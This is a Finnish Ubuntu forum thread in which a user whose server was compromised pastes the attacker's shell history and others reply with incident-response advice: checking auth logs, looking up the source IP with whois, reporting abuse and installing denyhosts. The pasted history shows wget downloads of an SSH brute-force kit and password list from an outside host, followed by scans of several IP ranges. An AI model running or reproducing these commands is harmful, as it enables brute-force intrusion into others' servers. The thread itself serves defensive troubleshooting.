Ubuntu Suomen keskustelualueet
Ubuntun käyttö => Ohjelmointi, palvelimet ja muu edistyneempi käyttö => Aiheen aloitti: Leko - 28.01.09 - klo:16.18
-
Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus. Sen .bash_historia näyttää tältä:
w
cd .cbk
cd fhc
wget http://users.volja.net/passlists/fhc.tar.gz
tar -xzvf fhc.tar.gz
cd fhc
./start 84.244
wget http://users.volja.net/passlists/norrox.txt
mv norrox.txt pass_file
./start 128.39
./start 199.6;./start 204.79;./start 204.231;./start 205.248
Paketti on mulla vielä tallessa. Kertokaapa, kuka tai mikä taho olisi oikeasti kiinnostunut asiasta. Yst. vast. tänne tai privalla.
-
Kannattaapi katsella mistä ip-osoitteista tälläinen on tullut.
Eli grep sshd <käyttäjänimi> /var/log/auth.log
Sieltä pitäisi löytyä rivejä tyyliin: Jan 28 13:44:51 zeus sshd[15824]: Accepted password for joona from 192.168.0.102 port 1036 ssh2
Siitä poimit ip-osoitteen ja laitat päätteeseen että whois <ip-osoite>.
Sepä kertoo sitten mikä isp toisessa päässä on ja varmaan löytyy myös sähköpostiosoite mihin voi ottaa yhteyttä. Usein tyyliin abuse@isp.pääte.
-
Tuoltapäin näyttää olevan, vaikka en minä mitään sillä tiedolla tee.
IP address 84.255.243.157
Hostname 84-255-243-157.static.t-2.net
ISP T-2 Access Network
Country Slovenia Slovenia
-
Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus.
Ensi kerralla kannattaa laittaa koneelle denyhosts tai vastaava jotta skannailut eivät onnistu yhtä helposti.